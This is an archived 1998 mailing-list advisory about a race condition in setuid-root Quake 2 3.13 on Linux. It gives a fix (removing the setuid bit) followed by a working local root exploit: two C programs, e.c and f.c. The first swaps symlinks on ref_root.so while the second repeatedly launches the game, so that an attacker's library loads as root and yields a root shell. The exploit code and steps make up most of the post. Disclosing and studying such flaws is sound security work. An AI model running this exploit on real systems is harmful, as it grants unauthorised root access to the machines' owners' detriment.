Quake 2 Linux 3.13 - ref_root.so still works

From: kevingeoat_private
Date: Wed Feb 25 1998 - 05:49:10 PST

Next message: Philippe Regnauld: "Re: FreeBSD getpass "feature""

Previous message: kevingeoat_private: "Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Vulnerable:
Everyone who followed the installation instructions and made Quake2 setuid
root.

Solution:
chmod u-s quake2.

Exploit:
In version 3.13, Quake2 trys to protect itself by checking the permissions
of a library before loading it.  This just introduces a race condition.

Simply find a file that is owned by root and has 0700
permissions, call ref_root.so ref_root.real.so, run e.c (./e
/usr/games/quake2/ref_soft.so &, for example)
in background, and then run f.c.  You'll have a root shell after a few
minutes.

e.c:
#include <unistd.h>

void main(int argc, char **argv) {
while(1) {
        unlink("ref_root.so");
        symlink(argv[1],"ref_root.so");
        unlink("ref_root.so");
        symlink("ref_root.real.so","ref_root.so");
}
}

f.c:
#include <stdlib.h>

void main() {
while (1) {
system("/usr/games/quake/quake2 +set vid_ref root");
}
}

Next message: Philippe Regnauld: "Re: FreeBSD getpass "feature""
Previous message: kevingeoat_private: "Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:43:15 PDT